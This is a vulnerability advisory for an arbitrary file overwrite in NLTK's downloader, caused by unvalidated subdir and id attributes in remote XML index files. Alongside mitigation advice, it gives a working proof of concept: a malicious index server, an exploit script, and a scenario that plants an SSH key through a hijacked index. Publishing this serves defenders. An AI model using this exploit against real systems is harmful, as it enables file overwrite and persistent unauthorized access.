NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| nltk | pip | <= 3.9.2 | No patch |
Do you use nltk? You're affected.
Severity & Risk
Recommended Action
- 1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`). 2. Patch: No official patched version released as of CVE publication—monitor https://github.com/nltk/nltk for release. 3. Workaround (preferred): Pre-download all required corpora and bake into container images; disable runtime NLTK downloads in production entirely. 4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines. 5. Audit: Search codebase for `Downloader(server_index_url=` with non-official URLs—treat as critical finding requiring immediate remediation. 6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages). 7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
## Vulnerability Description The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to: 1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system 2. **Arbitrary File Creation**: Create arbitrary files 3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.) ## Vulnerability Principle ### Key Code Locations **1. XML Parsing Without Validation** (`nltk/downloader.py:253`) ```python self.filename = os.path.join(subdir, id + ext) ``` - `subdir` and `id` are directly from XML attributes without any validation **2. Path Construction Without Checks** (`nltk/downloader.py:679`) ```python filepath = os.path.join(download_dir, info.filename) ``` - Directly uses `filename` which may contain path traversal **3. Unrestricted Directory Creation** (`nltk/downloader.py:687`) ```python os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True) ``` - Can create arbitrary directories outside the download directory **4. File Writing Without Protection** (`nltk/downloader.py:695`) ```python with open(filepath, "wb") as outfile: ``` - Can write to arbitrary locations in the file system ### Attack Chain ``` 1. Attacker controls remote XML index server ↓ 2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../> ↓ 3. Victim executes: downloader.download('passwd') ↓ 4. Package.fromxml() creates object, filename = "../../etc/passwd.zip" ↓ 5. _download_package() constructs path: download_dir + "../../etc/passwd.zip" ↓ 6. os.makedirs() creates directory: download_dir + "../../etc" ↓ 7. open(filepath, "wb") writes file to /etc/passwd.zip ↓ 8. System file is overwritten! ``` ## Impact Scope 1. **System File Overwrite** ## Reproduction Steps ### Environment Setup 1. Install NLTK ```bash pip install nltk ``` 2. Prepare malicious server and exploit script (see PoC section) ### Reproduction Process **Step 1: Start malicious server** ```bash python3 malicious_server.py ``` **Step 2: Run exploit script** ```bash python3 exploit_vulnerability.py ``` **Step 3: Verify results** ```bash ls -la /tmp/test_file.zip ``` ## Proof of Concept ### Malicious Server (malicious_server.py) ```python #!/usr/bin/env python3 """Malicious HTTP Server - Provides XML index with path traversal""" import os import tempfile import zipfile from http.server import HTTPServer, BaseHTTPRequestHandler # Create temporary directory server_dir = tempfile.mkdtemp(prefix="nltk_malicious_") # Create malicious XML (contains path traversal) malicious_xml = """<?xml version="1.0"?> <nltk_data> <packages> <package id="test_file" subdir="../../../../../../../../../tmp" url="http://127.0.0.1:8888/test.zip" size="100" unzipped_size="100" unzip="0"/> </packages> </nltk_data> """ # Save files with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f: f.write(malicious_xml) with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf: zf.writestr("test.txt", "Path traversal attack!") # HTTP Handler class Handler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/malicious_index.xml': self.send_response(200) self.send_header('Content-type', 'application/xml') self.end_headers() with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f: self.wfile.write(f.read()) elif self.path == '/test.zip': self.send_response(200) self.send_header('Content-type', 'application/zip') self.end_headers() with open(os.path.join(server_dir, 'test.zip'), 'rb') as f: self.wfile.write(f.read()) else: self.send_response(404) self.end_headers() def log_message(self, format, *args): pass # Start server if __name__ == "__main__": port = 8888 server = HTTPServer(("0.0.0.0", port), Handler) print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml") print("Press Ctrl+C to stop") try: server.serve_forever() except KeyboardInterrupt: print("\nServer stopped") ``` ### Exploit Script (exploit_vulnerability.py) ```python #!/usr/bin/env python3 """AFO Vulnerability Exploit Script""" import os import tempfile def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"): download_dir = tempfile.mkdtemp(prefix="nltk_exploit_") print(f"Download directory: {download_dir}") # Exploit vulnerability from nltk.downloader import Downloader downloader = Downloader(server_index_url=server_url, download_dir=download_dir) downloader.download("test_file", quiet=True) # Check results expected_path = "/tmp/test_file.zip" if os.path.exists(expected_path): print(f"\n✗ Exploit successful! File written to: {expected_path}") print(f"✗ Path traversal attack successful!") else: print(f"\n? File not found, download may have failed") if __name__ == "__main__": exploit() ``` ### Execution Results ``` ✗ Exploit successful! File written to: /tmp/test_file.zip ✗ Path traversal attack successful! ```
Exploitation Scenario
An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime against an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a controlled malicious server. The malicious server returns a crafted XML with subdir='../../../.ssh' and id='authorized_keys'. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in authorized_keys—granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H References
- github.com/advisories/GHSA-469j-vmhf-r6v7
- github.com/advisories/GHSA-469j-vmhf-r6v7
- github.com/advisories/GHSA-469j-vmhf-r6v7
- github.com/advisories/GHSA-469j-vmhf-r6v7
- github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7
- github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7
- github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7
- github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7